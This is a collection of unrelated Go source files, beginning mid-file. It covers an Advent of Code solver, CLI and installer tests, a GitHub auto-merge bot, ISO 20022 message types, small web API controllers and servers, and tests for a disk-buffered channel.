//this round didn't count
currentround--
}
}
//round will still be ++ due to for loop, so -1 to get last value
fmt.Println("last full round ", currentround-1, (currentround-1)*sumhitpoints(units))
return true
}
func main2() {
fmt.Println(">Part 2")
for elfpower := 4; elfpower < 200; elfpower++ {
fmt.Println("Testing elf powah ", elfpower)
units, g, x, y := loaddata2(data(), elfpower)
if part2(units, g, x, y) {
fmt.Println("Elf Power was ", elfpower)
break
}
}
}
|
package cmd
import (
"os"
"strings"
"testing"
"github.com/stretchr/testify/assert"
"github.com/instructure-bridge/muss/config"
"github.com/instructure-bridge/muss/testutil"
)
func testRootCmd(args ...string) (int, string, string) {
var stdout, stderr strings.Builder
cfg, _ := config.NewConfigFromMap(nil)
rootCmd := NewRootCommand(cfg)
rootCmd.SetOut(&stdout)
rootCmd.SetErr(&stderr)
exitCode := ExecuteRoot(rootCmd, args)
return exitCode, stdout.String(), stderr.String()
}
func getLines(s string, want int) []string {
lines := strings.SplitAfter(s, "\n")
end := len(lines)
if want < end {
end = want
}
return lines[0:end]
}
func TestRootCommand(t *testing.T) {
withTestPath(t, func(t *testing.T) {
t.Run("bad flag", func(t *testing.T) {
exitCode, stdout, stderr := testRootCmd("--foo")
assert.Equal(t, 1, exitCode, "exit 1")
assert.Equal(t, "", stdout)
assert.Equal(t,
[]string{"Error: unknown flag: --foo\n", "\n", "Usage:\n", " muss [command]\n"},
getLines(stderr, 4),
)
})
t.Run("bad subcmd", func(t *testing.T) {
exitCode, stdout, stderr := testRootCmd("foo")
assert.Equal(t, 1, exitCode, "exit 1")
assert.Equal(t, "", stdout)
assert.Equal(t,
[]string{"Error: unknown command \"foo\" for \"muss\"\n", "\n", "Usage:\n", " muss [command]\n"},
getLines(stderr, 4),
)
})
t.Run("bad subcmd flag", func(t *testing.T) {
exitCode, stdout, stderr := testRootCmd("wrap", "--foo")
assert.Equal(t, 1, exitCode, "exit 1")
assert.Equal(t, "", stdout)
assert.Equal(t,
[]string{"Error: unknown flag: --foo\n", "\n", "Usage:\n", " muss wrap [flags]\n"},
getLines(stderr, 4),
)
})
t.Run("non-zero delegated command exit", func(t *testing.T) {
os.Setenv("MUSS_TEST_DC_ERROR", "2")
defer os.Unsetenv("MUSS_TEST_DC_ERROR")
exitCode, stdout, stderr := testRootCmd("pull")
assert.Equal(t, 2, exitCode, "exit 2")
assert.Equal(t, "", stdout)
assert.Equal(t, "", stderr)
})
t.Run("success", func(t *testing.T) {
exitCode, stdout, stderr := testRootCmd("pull")
assert.Equal(t, 0, exitCode, "exit 0")
assert.Equal(t, "docker-compose\npull\n", stdout)
assert.Equal(t, "std err\n", stderr)
})
})
t.Run("Execute()", func(t *testing.T) {
testutil.WithTempDir(t, func(tmpdir string) {
yaml := `---
module_definitions:
- name: foo
configs:
sole:
version: "1.5"
`
testutil.WriteFile(t, "muss.yaml", yaml)
dest := "docker-compose.yml"
testutil.NoFileExists(t, dest)
assert.Equal(t, 0, Execute([]string{"wrap", "true"}), "exit 0")
assert.Contains(t, testutil.ReadFile(t, dest), `version: "1.5"`, "config written")
os.Remove(dest)
testutil.NoFileExists(t, dest)
assert.Equal(t, 1, Execute([]string{"wrap", "false"}), "exit 1")
assert.Contains(t, testutil.ReadFile(t, dest), `version: "1.5"`, "config written again")
})
})
}
|
package main
import (
"final-project/config/postgres"
"final-project/http/routes"
todos "final-project/repository/postgres"
"fmt"
"log"
"os"
"os/signal"
"syscall"
"github.com/subosito/gotenv"
)
func init() {
log.SetFlags(log.Lshortfile | log.LstdFlags)
if err := gotenv.Load(); err != nil {
log.Println(err)
}
}
func main() {
db := postgres.Connect()
repo := todos.NewTodoRepo(db)
errs := make(chan error)
go func() {
sigChan := make(chan os.Signal, 1)
signal.Notify(sigChan, syscall.SIGTERM, syscall.SIGINT)
sig := <-sigChan
log.Printf("Signal notified %v", sig)
errs <- fmt.Errorf("%v", sig)
}()
go func() {
router := routes.NewRouter(repo)
if err := router.Run(":" + os.Getenv("PORT")); err != nil {
errs <- err
}
}()
log.Fatal(<-errs)
}
|
package install_test
import (
"errors"
"os"
"path/filepath"
"time"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
bmeventlog "github.com/cloudfoundry/bosh-micro-cli/eventlogging"
bmrel "github.com/cloudfoundry/bosh-micro-cli/release"
bmtempcomp "github.com/cloudfoundry/bosh-micro-cli/templatescompiler"
fakesys "github.com/cloudfoundry/bosh-agent/system/fakes"
faketime "github.com/cloudfoundry/bosh-agent/time/fakes"
fakebmlog "github.com/cloudfoundry/bosh-micro-cli/eventlogging/fakes"
fakebminstall "github.com/cloudfoundry/bosh-micro-cli/install/fakes"
fakebmtemcomp "github.com/cloudfoundry/bosh-micro-cli/templatescompiler/fakes"
. "github.com/cloudfoundry/bosh-micro-cli/install"
)
var _ = Describe("JobInstaller", func() {
var (
fs *fakesys.FakeFileSystem
jobInstaller JobInstaller
job bmrel.Job
packageInstaller *fakebminstall.FakePackageInstaller
blobExtractor *fakebminstall.FakeBlobExtractor
templateRepo *fakebmtemcomp.FakeTemplatesRepo
jobsPath string
packagesPath string
eventLogger *fakebmlog.FakeEventLogger
timeService *faketime.FakeService
)
Context("Installing the job", func() {
BeforeEach(func() {
fs = fakesys.NewFakeFileSystem()
packageInstaller = fakebminstall.NewFakePackageInstaller()
blobExtractor = fakebminstall.NewFakeBlobExtractor()
templateRepo = fakebmtemcomp.NewFakeTemplatesRepo()
jobsPath = "/fake/jobs"
packagesPath = "/fake/packages"
eventLogger = fakebmlog.NewFakeEventLogger()
timeService = &faketime.FakeService{}
jobInstaller = NewJobInstaller(fs, packageInstaller, blobExtractor, templateRepo, jobsPath, packagesPath, eventLogger, timeService)
job = bmrel.Job{
Name: "cpi",
}
templateRepo.SetFindBehavior(job, bmtempcomp.TemplateRecord{BlobID: "fake-blob-id", BlobSHA1: "fake-sha1"}, true, nil)
blobExtractor.SetExtractBehavior("fake-blob-id", "fake-sha1", "/fake/jobs/cpi", nil)
})
It("makes the files in the job's bin directory executable", func() {
cpiExecutablePath := "/fake/jobs/cpi/bin/cpi"
fs.SetGlob("/fake/jobs/cpi/bin/*", []string{cpiExecutablePath})
fs.WriteFileString(cpiExecutablePath, "contents")
_, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
Expect(fs.GetFileTestStat(cpiExecutablePath).FileMode).To(Equal(os.FileMode(0755)))
})
It("returns a record of the installed job", func() {
installedJob, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
Expect(installedJob).To(Equal(
InstalledJob{
Name: "cpi",
Path: "/fake/jobs/cpi",
},
))
})
It("creates basic job layout", func() {
_, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
Expect(fs.FileExists(filepath.Join(jobsPath, job.Name))).To(BeTrue())
Expect(fs.FileExists(packagesPath)).To(BeTrue())
})
It("finds the rendered templates for the job from the repo", func() {
_, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
Expect(templateRepo.FindInputs).To(ContainElement(fakebmtemcomp.FindInput{Job: job}))
})
It("tells the blobExtractor to extract the templates into the installed job dir", func() {
_, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
Expect(blobExtractor.ExtractInputs).To(ContainElement(fakebminstall.ExtractInput{
BlobID: "fake-blob-id",
BlobSHA1: "fake-sha1",
TargetDir: filepath.Join(jobsPath, job.Name),
}))
})
It("logs events to the event logger", func() {
installStart := time.Now()
installFinish := installStart.Add(1 * time.Second)
timeService.NowTimes = []time.Time{installStart, installFinish}
_, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
expectedStartEvent := bmeventlog.Event{
Time: installStart,
Stage: "installing CPI jobs",
Total: 1,
Task: "cpi",
Index: 1,
State: bmeventlog.Started,
}
expectedFinishEvent := bmeventlog.Event{
Time: installFinish,
Stage: "installing CPI jobs",
Total: 1,
Task: "cpi",
Index: 1,
State: bmeventlog.Finished,
}
Expect(eventLogger.LoggedEvents).To(ContainElement(expectedStartEvent))
Expect(eventLogger.LoggedEvents).To(ContainElement(expectedFinishEvent))
})
It("logs failure event", func() {
fs.MkdirAllError = errors.New("fake-mkdir-error")
installStart := time.Now()
installFail := installStart.Add(1 * time.Second)
timeService.NowTimes = []time.Time{installStart, installFail}
_, err := jobInstaller.Install(job)
Expect(err).To(HaveOccurred())
expectedStartEvent := bmeventlog.Event{
Time: installStart,
Stage: "installing CPI jobs",
Total: 1,
Task: "cpi",
Index: 1,
State: bmeventlog.Started,
}
expectedFailEvent := bmeventlog.Event{
Time: installFail,
Stage: "installing CPI jobs",
Total: 1,
Task: "cpi",
Index: 1,
State: bmeventlog.Failed,
Message: "Creating jobs directory `/fake/jobs/cpi': fake-mkdir-error",
}
Expect(eventLogger.LoggedEvents).To(ContainElement(expectedStartEvent))
Expect(eventLogger.LoggedEvents).To(ContainElement(expectedFailEvent))
})
Context("when the job has packages", func() {
var pkg1 bmrel.Package
BeforeEach(func() {
pkg1 = bmrel.Package{Name: "fake-pkg-name"}
job.Packages = []*bmrel.Package{&pkg1}
packageInstaller.SetInstallBehavior(&pkg1, packagesPath, nil)
templateRepo.SetFindBehavior(job, bmtempcomp.TemplateRecord{BlobID: "fake-blob-id", BlobSHA1: "fake-sha1"}, true, nil)
})
It("install packages correctly", func() {
_, err := jobInstaller.Install(job)
Expect(err).ToNot(HaveOccurred())
Expect(packageInstaller.InstallInputs).To(ContainElement(
fakebminstall.InstallInput{Package: &pkg1, Target: packagesPath},
))
})
It("return err when package installation fails", func() {
packageInstaller.SetInstallBehavior(
&pkg1,
packagesPath,
errors.New("Installation failed, yo"),
)
_, err := jobInstaller.Install(job)
Expect(err).To(HaveOccurred())
Expect(err.Error()).To(ContainSubstring("Installation failed"))
})
})
})
})
|
package epic
import (
"fmt"
"log"
"github.com/google/go-github/github"
"github.com/karen-irc/popuko/operation"
"github.com/karen-irc/popuko/queue"
"github.com/karen-irc/popuko/setting"
)
func CheckAutoBranch(client *github.Client, autoMergeRepo *queue.AutoMergeQRepo, ev *github.StatusEvent) {
log.Println("info: Start: checkAutoBranch")
defer log.Println("info: End: checkAutoBranch")
if *ev.State == "pending" {
log.Println("info: Not handle pending status event")
return
}
log.Printf("info: Start to handle status event: %v\n", *ev.State)
repoOwner := *ev.Repo.Owner.Login
repoName := *ev.Repo.Name
log.Printf("info: Target repository is %v/%v\n", repoOwner, repoName)
repoInfo := GetRepositoryInfo(client.Repositories, repoOwner, repoName)
if repoInfo == nil {
log.Println("debug: cannot get repositoryInfo")
return
}
log.Println("info: success to load the configure.")
if !repoInfo.EnableAutoMerge {
log.Println("info: this repository does not enable merging into master automatically.")
return
}
log.Println("info: Start to handle auto merging the branch.")
qHandle := autoMergeRepo.Get(repoOwner, repoName)
if qHandle == nil {
log.Println("error: cannot get the queue handle")
return
}
qHandle.Lock()
defer qHandle.Unlock()
q := qHandle.Load()
if !q.HasActive() {
log.Println("info: there is no testing item")
return
}
active := q.GetActive()
if active == nil {
log.Println("error: `active` should not be null")
return
}
log.Println("info: got the active item.")
if !isRelatedToAutoBranch(active, ev, repoInfo.AutoBranchName) {
log.Printf("info: The event's tip sha does not equal to the one which is tesing actively in %v/%v\n", repoOwner, repoName)
return
}
log.Println("info: the status event is related to auto branch.")
mergeSucceedItem(client, repoOwner, repoName, repoInfo, q, ev)
q.RemoveActive()
q.Save()
tryNextItem(client, repoOwner, repoName, q, repoInfo.AutoBranchName)
log.Println("info: complete to start the next trying")
}
func isRelatedToAutoBranch(active *queue.AutoMergeQueueItem, ev *github.StatusEvent, autoBranch string) bool {
if !operation.IsIncludeAutoBranch(ev.Branches, autoBranch) {
log.Printf("warn: this status event (%v) does not include the auto branch\n", *ev.ID)
return false
}
if ok := checkCommitHashOnTrying(active, ev); !ok {
return false
}
log.Println("info: the tip of auto branch is same as `active.SHA`")
return true
}
func checkCommitHashOnTrying(active *queue.AutoMergeQueueItem, ev *github.StatusEvent) bool {
autoTipSha := active.AutoBranchHead
if autoTipSha == nil {
return false
}
if *autoTipSha != *ev.SHA {
log.Printf("debug: The commit hash which contained by the status event: %v\n", *ev.SHA)
log.Printf("debug: The commit hash is pinned to the status queue as the tip of auto branch: %v\n", autoTipSha)
return false
}
return true
}
func mergeSucceedItem(client *github.Client,
owner string,
name string,
repoInfo *setting.RepositoryInfo,
q *queue.AutoMergeQueue,
ev *github.StatusEvent) bool {
active := q.GetActive()
prNum := active.PullRequest
prInfo, _, err := client.PullRequests.Get(owner, name, prNum)
if err != nil {
log.Println("info: could not fetch the pull request information.")
return false
}
if *prInfo.State != "open" {
log.Printf("info: the pull request #%v has been resolved the state\n", prNum)
return true
}
if *ev.State != "success" {
log.Println("info: could not merge pull request")
comment := ":collision: The result of what tried to merge this pull request is `" + *ev.State + "`."
commentStatus(client, owner, name, prNum, comment, repoInfo.AutoBranchName)
currentLabels := operation.GetLabelsByIssue(client.Issues, owner, name, prNum)
if currentLabels == nil {
return false
}
labels := operation.AddFailsTestsWithUpsreamLabel(currentLabels)
_, _, err = client.Issues.ReplaceLabelsForIssue(owner, name, prNum, labels)
if err != nil {
log.Println("warn: could not change labels of the issue")
}
return false
}
comment := ":tada: The result of what tried to merge this pull request is `" + *ev.State + "`."
commentStatus(client, owner, name, prNum, comment, repoInfo.AutoBranchName)
if ok := operation.MergePullRequest(client, owner, name, prInfo, active.PrHead); !ok {
log.Printf("info: cannot merge pull request #%v\n", prNum)
return false
}
if repoInfo.DeleteAfterAutoMerge {
operation.DeleteBranchByPullRequest(client.Git, prInfo)
}
log.Printf("info: complete merging #%v into master\n", prNum)
return true
}
func commentStatus(client *github.Client, owner, name string, prNum int, comment string, autoBranch string) {
status, _, err := client.Repositories.GetCombinedStatus(owner, name, autoBranch, nil)
if err != nil {
log.Println("error: could not get the status about the auto branch.")
}
if status != nil {
comment += "\n\n"
for _, s := range status.Statuses {
if s.TargetURL == nil {
continue
}
var item string
if s.Description == nil || *s.Description == "" {
item = fmt.Sprintf("* %v\n", *s.TargetURL)
} else {
item = fmt.Sprintf("* [%v](%v)\n", *s.Description, *s.TargetURL)
}
comment += item
}
}
if ok := operation.AddComment(client.Issues, owner, name, prNum, comment); !ok {
log.Println("error: could not write the comment about the result of auto branch.")
}
}
func tryNextItem(client *github.Client, owner, name string, q *queue.AutoMergeQueue, autoBranch string) (ok, hasNext bool) {
defer q.Save()
next, nextInfo := getNextAvailableItem(client, owner, name, q)
if next == nil {
log.Printf("info: there is no awating item in the queue of %v/%v\n", owner, name)
return true, false
}
nextNum := next.PullRequest
ok, commit := operation.TryWithMaster(client, owner, name, nextInfo, autoBranch)
if !ok {
log.Printf("info: we cannot try #%v with the latest `master`.", nextNum)
return tryNextItem(client, owner, name, q, autoBranch)
}
next.AutoBranchHead = &commit
q.SetActive(next)
log.Printf("info: pin #%v as the active item to queue\n", nextNum)
return true, true
}
func getNextAvailableItem(client *github.Client,
owner string,
name string,
queue *queue.AutoMergeQueue) (*queue.AutoMergeQueueItem, *github.PullRequest) {
issueSvc := client.Issues
prSvc := client.PullRequests
log.Println("Start to find the next item")
defer log.Println("End to find the next item")
for {
ok, next := queue.TakeNext()
if !ok || next == nil {
log.Printf("debug: there is no awating item in the queue of %v/%v\n", owner, name)
return nil, nil
}
log.Println("debug: the next item has fetched from queue.")
prNum := next.PullRequest
nextInfo, _, err := prSvc.Get(owner, name, prNum)
if err != nil {
log.Println("debug: could not fetch the pull request information.")
continue
}
if next.PrHead != *nextInfo.Head.SHA {
operation.CommentHeadIsDifferentFromAccepted(issueSvc, owner, name, prNum)
continue
}
if state := *nextInfo.State; state != "open" {
log.Printf("debug: the pull request #%v has been resolved the state as `%v`\n", prNum, state)
continue
}
ok, mergeable := operation.IsMergeable(prSvc, owner, name, prNum, nextInfo)
if !ok {
log.Println("info: We treat it as 'mergeable' to avoid miss detection because we could not fetch the pr info,")
continue
}
if !mergeable {
comment := ":lock: Merge conflict"
if ok := operation.AddComment(issueSvc, owner, name, prNum, comment); !ok {
log.Println("error: could not write the comment about the result of auto branch.")
}
currentLabels := operation.GetLabelsByIssue(issueSvc, owner, name, prNum)
if currentLabels == nil {
continue
}
labels := operation.AddNeedRebaseLabel(currentLabels)
log.Printf("debug: the changed labels: %v\n", labels)
_, _, err = issueSvc.ReplaceLabelsForIssue(owner, name, prNum, labels)
if err != nil {
log.Println("warn: could not change labels of the issue")
}
continue
} else {
label := operation.GetLabelsByIssue(issueSvc, owner, name, prNum)
if label == nil {
continue
}
if !operation.HasLabelInList(label, operation.LABEL_AWAITING_MERGE) {
continue
}
}
return next, nextInfo
}
}
|
package semt
import (
"encoding/xml"
"github.com/thought-machine/finance-messaging/iso20022"
)
type Document01600101 struct {
XMLName xml.Name `xml:"urn:iso:std:iso:20022:tech:xsd:semt.016.001.01 Document"`
Message *IntraPositionMovementPostingReportV01 `xml:"IntraPosMvmntPstngRpt"`
}
func (d *Document01600101) AddMessage() *IntraPositionMovementPostingReportV01 {
d.Message = new(IntraPositionMovementPostingReportV01)
return d.Message
}
// Scope
// An account servicer sends an IntraPositionMovementPostingReport to an account owner to provide the details of increases and decreases in securities with a given status within a holding, ie, intra-position transfers, which occurred during a specified period, for all or selected securities in a specified safekeeping account which the account servicer holds for the account owner.
// The account servicer/owner relationship may be:
// - a central securities depository or another settlement market infrastructure acting on behalf of their participants
// - an agent (sub-custodian) acting on behalf of their global custodian customer, or
// - a custodian acting on behalf of an investment management institution or a broker/dealer.
// Usage
// The message may also be used to:
// - re-send a message previously sent (the sub-function of the message is Duplicate),
// - provide a third party with a copy of a message for information (the sub-function of the message is Copy),
// - re-send to a third party a copy of a message for information (the sub-function of the message is Copy Duplicate).
// ISO 15022 - 20022 Coexistence
// This ISO 20022 message is reversed engineered from ISO 15022. Both standards will coexist for a certain number of years. Until this coexistence period ends, the usage of certain data types is restricted to ensure interoperability between ISO 15022 and 20022 users. Compliance to these rules is mandatory in a coexistence environment. The coexistence restrictions are described in a Textual Rule linked to the Message Items they concern. These coexistence textual rules are clearly identified as follows: “CoexistenceXxxxRule”.
type IntraPositionMovementPostingReportV01 struct {
// Information that unambiguously identifies an IntraPositionMovementPostingReport message as known by the account servicer.
Identification *iso20022.DocumentIdentification11 `xml:"Id"`
// Page number of the message (within a statement) and continuation indicator to indicate that the statement is to continue or that the message is the last page of the statement.
Pagination *iso20022.Pagination `xml:"Pgntn"`
// General information related to report.
StatementGeneralDetails *iso20022.Statement15 `xml:"StmtGnlDtls"`
// Party that legally owns the account.
AccountOwner *iso20022.PartyIdentification13Choice `xml:"AcctOwnr,omitempty"`
// Account to or from which a securities entry is made.
SafekeepingAccount *iso20022.SecuritiesAccount13 `xml:"SfkpgAcct"`
// Reporting per financial instrument.
FinancialInstrument []*iso20022.FinancialInstrumentDetails1 `xml:"FinInstrm,omitempty"`
// Party that originated the message, if other than the sender.
MessageOriginator *iso20022.PartyIdentification10Choice `xml:"MsgOrgtr,omitempty"`
// Party that is the final destination of the message, if other than the receiver.
MessageRecipient *iso20022.PartyIdentification10Choice `xml:"MsgRcpt,omitempty"`
}
func (i *IntraPositionMovementPostingReportV01) AddIdentification() *iso20022.DocumentIdentification11 {
i.Identification = new(iso20022.DocumentIdentification11)
return i.Identification
}
func (i *IntraPositionMovementPostingReportV01) AddPagination() *iso20022.Pagination {
i.Pagination = new(iso20022.Pagination)
return i.Pagination
}
func (i *IntraPositionMovementPostingReportV01) AddStatementGeneralDetails() *iso20022.Statement15 {
i.StatementGeneralDetails = new(iso20022.Statement15)
return i.StatementGeneralDetails
}
func (i *IntraPositionMovementPostingReportV01) AddAccountOwner() *iso20022.PartyIdentification13Choice {
i.AccountOwner = new(iso20022.PartyIdentification13Choice)
return i.AccountOwner
}
func (i *IntraPositionMovementPostingReportV01) AddSafekeepingAccount() *iso20022.SecuritiesAccount13 {
i.SafekeepingAccount = new(iso20022.SecuritiesAccount13)
return i.SafekeepingAccount
}
func (i *IntraPositionMovementPostingReportV01) AddFinancialInstrument() *iso20022.FinancialInstrumentDetails1 {
newValue := new(iso20022.FinancialInstrumentDetails1)
i.FinancialInstrument = append(i.FinancialInstrument, newValue)
return newValue
}
func (i *IntraPositionMovementPostingReportV01) AddMessageOriginator() *iso20022.PartyIdentification10Choice {
i.MessageOriginator = new(iso20022.PartyIdentification10Choice)
return i.MessageOriginator
}
func (i *IntraPositionMovementPostingReportV01) AddMessageRecipient() *iso20022.PartyIdentification10Choice {
i.MessageRecipient = new(iso20022.PartyIdentification10Choice)
return i.MessageRecipient
}
|
package main
import (
"encoding/json"
"fmt"
"os"
)
type (
// buoyCondition contains information for an individual station.
buoyCondition struct {
WindSpeed float64 `json:"wind_speed_milehour"`
WindDirection int `json:"wind_direction_degnorth"`
WindGust float64 `json:"gust_wind_speed_milehour"`
}
// buoyLocation contains the buoys location.
buoyLocation struct {
Type string `json:"type"`
Coordinates []float64 `json:"coordinates"`
}
// BuoyStation contains information for an individual station.
buoyStation struct {
StationID string `json:"station_id"`
Name string `json:"name"`
LocDesc string `json:"location_desc"`
Condition buoyCondition `json:"condition"`
Location buoyLocation `json:"location"`
}
)
func main() {
// Open the file
file, err := os.Open("data.json")
if err != nil {
fmt.Println("Open File", err)
return
}
// Schedule the file to be closed
defer file.Close()
// Decode the file into a slice of buoy stations
var stations []buoyStation
err = json.NewDecoder(file).Decode(&stations)
if err != nil {
fmt.Println("Decode File", err)
return
}
// Iterate over the slice and display each station
for _, station := range stations {
fmt.Printf("%+v\n\n", station)
}
}
|
package controllers
import (
"encoding/json"
"fmt"
"github.com/astaxie/beego"
)
func init() {
}
type baseApiController struct {
beego.Controller
}
func (this *baseApiController) GetCurrentUser(auth string) (auth_str map[string]string, err error) {
return map[string]string{"id": "1"}, nil
}
func (this *baseApiController) format_input() {
// 获取输入参数,依次为route中参数,post参数,url参数,body的json参数
// InputRequestBody 得到body体中的json字符串
body_json := map[string]interface{}{}
json.Unmarshal(this.Ctx.Input.RequestBody, &body_json)
input_map := map[string]interface{}{}
// params能得到路径中的命名参数, :key -> val
for k, v := range this.Ctx.Input.Params {
input_map[k[1:len(k)]] = v
}
// form可以得到get和post中的内容, key -> [val]
for k, v := range this.Ctx.Input.Request.Form {
input_map[k] = v[0]
}
// Input()得到get url后面的参数
for k, v := range this.Input() {
input_map[k] = v[0]
}
// body中的json字符串
for k, v := range body_json {
input_map[k] = v
}
this.Data["input_map"] = input_map
}
func (this *baseApiController) Prepare() {
header_auth := this.Ctx.Request.Header.Get("Authorization")
if header_auth == "" {
this.Abort("401")
} else {
current_user := map[string]string{"name": "name1"}
fmt.Println("the header_Auth is ")
fmt.Println(header_auth)
current_user, err := this.GetCurrentUser(header_auth)
if err != nil {
this.Data["json"] = map[string]string{"error": err.Error()}
this.ServeJson()
}
this.Data["current_user"] = current_user
}
this.format_input()
}
type ResponseMsg struct {
ErrCode int `json:"errcode"`
ErrMsg string `json:"errmsg"`
}
type ErrorController struct {
beego.Controller
}
func (this *ErrorController) Error401() {
this.EnableRender = false
result := ResponseMsg{401, "unauthorized"}
this.Data["json"] = result
this.ServeJson()
}
func (this *ErrorController) Error400() {
this.EnableRender = false
result := ResponseMsg{400, "input invalid"}
this.Data["json"] = result
this.ServeJson()
}
|
package server
import (
"net/http"
"os"
"time"
log "github.com/sirupsen/logrus"
"github.com/arthur404dev/api/restream"
"github.com/arthur404dev/api/websocket"
"github.com/labstack/echo/v4"
"github.com/labstack/echo/v4/middleware"
)
func Start(port string, hub *websocket.Hub) {
e := echo.New()
e.Use(middleware.CORSWithConfig(middleware.CORSConfig{
AllowOrigins: []string{"*"},
AllowMethods: []string{http.MethodGet, http.MethodConnect, http.MethodPost},
}))
e.Use(middleware.KeyAuthWithConfig(middleware.KeyAuthConfig{
KeyLookup: "query:api-key",
Validator: func(key string, c echo.Context) (bool, error) {
return key == os.Getenv("ACCESS_API_KEY"), nil
},
}))
e.Use(loggingMiddleware)
e.GET("/", statusPage)
e.GET("/ws", func(c echo.Context) error { return websocket.ServeWs(hub, c) })
e.POST("/restream/exchange", restream.ExchangeTokens)
log.WithField("port", port).Info("api is listening and serving...")
log.Fatal(e.Start(":" + port))
}
func loggingMiddleware(next echo.HandlerFunc) echo.HandlerFunc {
return func(c echo.Context) error {
start := time.Now()
res := next(c)
log.WithFields(log.Fields{
"method": c.Request().Method,
"path": c.Path(),
"status": c.Response().Status,
"latency_ns": time.Since(start).Nanoseconds(),
}).Info("request details")
return res
}
}
|
package bmlog_test
import (
"github.com/alfredyang1986/blackmirror/bmlog"
"os"
)
func ExampleStandardLogger() {
os.Setenv("LOGGER_USER", "example")
os.Setenv("LOGGER_DEBUG", "false")
os.Setenv("LOG_PATH", "/home/jeorch/work/test/temp/go.log")
bmlog.StandardLogger().Info("Example Test Info")
}
|
package controller
import (
"github.com/GoAdminGroup/go-admin/context"
"github.com/GoAdminGroup/go-admin/modules/file"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/constant"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/guard"
"github.com/GoAdminGroup/go-admin/plugins/admin/modules/response"
)
func (h *Handler) ApiCreate(ctx *context.Context) {
param := guard.GetNewFormParam(ctx)
if len(param.MultiForm.File) > 0 {
err := file.GetFileEngine(h.config.FileUploadEngine.Name).Upload(param.MultiForm)
if err != nil {
response.Error(ctx, err.Error())
return
}
}
err := param.Panel.InsertData(param.Value())
if err != nil {
response.Error(ctx, err.Error())
return
}
response.Ok(ctx)
}
func (h *Handler) ApiCreateForm(ctx *context.Context) {
var (
params = guard.GetShowNewFormParam(ctx)
prefix, paramStr = params.Prefix, params.Param.GetRouteParamStr()
panel = h.table(prefix, ctx)
formInfo = panel.GetNewFormInfo()
infoUrl = h.routePathWithPrefix("api_info", prefix) + paramStr
newUrl = h.routePathWithPrefix("api_new", prefix)
referer = ctx.Referer()
f = panel.GetActualNewForm()
)
if referer != "" && !isInfoUrl(referer) && !isNewUrl(referer, ctx.Query(constant.PrefixKey)) {
infoUrl = referer
}
response.OkWithData(ctx, map[string]interface{}{
"panel": formInfo,
"urls": map[string]string{
"info": infoUrl,
"new": newUrl,
},
"pk": panel.GetPrimaryKey().Name,
"header": f.HeaderHtml,
"footer": f.FooterHtml,
"prefix": h.config.PrefixFixSlash(),
"token": h.authSrv().AddToken(),
"operation_footer": formFooter("new", f.IsHideContinueEditCheckBox, f.IsHideContinueNewCheckBox,
f.IsHideResetButton, f.FormNewBtnWord),
})
}
|
package pelichan
import (
"github.com/beeker1121/goque"
"log"
"math/rand"
"net/http"
_ "net/http/pprof"
"os"
"strconv"
"sync"
"testing"
"time"
)
// TODO: DeqErrCB and DecErrCB tests
func init() {
go func() {
log.Println(http.ListenAndServe("localhost:6060", nil))
}()
rand.Seed(time.Now().UnixNano())
}
type MyStr struct {
Data string
}
type MyInt struct {
Data int
}
func DecMyStr(item *goque.Item) (interface{}, error) {
var obj *MyStr
err := item.ToObject(&obj)
return obj, err
}
func DecMyInt(item *goque.Item) (interface{}, error) {
var obj *MyInt
err := item.ToObject(&obj)
return obj, err
}
const dbDirectory = "TMPDB"
func prepChan(t *testing.T, indepth, outdepth int,
decCB func(item *goque.Item) (interface{}, error)) (
dbch *DiskBufferedChan,
src chan interface{},
sink <-chan interface{},
abort chan struct{}) {
src = make(chan interface{}, indepth)
dbch, sink, err := NewDiskBufferedChan(dbDirectory, outdepth, decCB, src, &testLogger{t})
if err != nil {
t.Fatalf("Error: %s", err)
}
return
}
func suck(t *testing.T, sink <-chan interface{}) (cnt int) {
for range sink {
cnt++
}
return
}
const iters = 10
const sleepTime = time.Millisecond * 50
func TestDiskBufferedChan_SimpleDirect(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
go func() {
for i := 0; i < iters; i++ {
<-sink
}
}()
for i := 0; i < iters; i++ {
src <- &MyStr{"Data_" + strconv.Itoa(i)}
time.Sleep(sleepTime)
}
fwd, wr, rd := d.GetStats()
d.Close()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
if fwd != uint64(iters) {
t.Fatalf("Non direct send detected!")
}
if wr > 0 || rd > 0 {
t.Fatalf("Parasite reads/writes detected")
}
}
func TestDiskBufferedChan_SimpleDirectPartial(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
go func() {
for i := 0; i < iters/2; i++ {
<-sink
}
}()
for i := 0; i < iters; i++ {
src <- &MyStr{"Data_" + strconv.Itoa(i)}
time.Sleep(sleepTime)
}
time.Sleep(sleepTime * 5)
for i := 0; i < (iters - iters/2); i++ {
<-sink
}
fwd, wr, rd := d.GetStats()
d.Close()
t.Logf("Pipe stats:\nDirect: %d\nWrites: %d\nReads: %d\n", fwd, wr, rd)
if fwd != uint64(iters/2) {
t.Fatalf("Non direct sends are more than half!")
}
if wr != rd || wr != (iters-iters/2) {
t.Fatalf("Parasite reads/writes detected")
}
}
func TestDiskBufferedChan_SuddenAbort(t *testing.T) {
os.RemoveAll(dbDirectory)
d, src, sink, _ := prepChan(t, 0, 0, DecMyStr)
var sendBlockedOn = -1
var sum1 int
go func() {
sum1 = suck(t, sink)
}()
var abortNum = (rand.Int() % (iters - 1)) + 1
OUT:
for i := 1; i <= iters; i++ {
select {
case src <- &MyStr{"Data_" + strconv.Itoa(i)}:
case <-time.Tick(time.Second):
t.Logf("Send timeout abort on '%d'", i)
sendBlockedOn = i
break OUT
}
if i == abortNum {
t.Logf("Sudden abort on %d", i)
d.Halt()
//close(d.chHalt) // Hacky abort without wait for completion
//<-d.chFWDone // ...well, with a bit, to ensure precise timeout iteration
}
}
fwd, wr, rd := d.GetStats()
close(src)
d.Close()
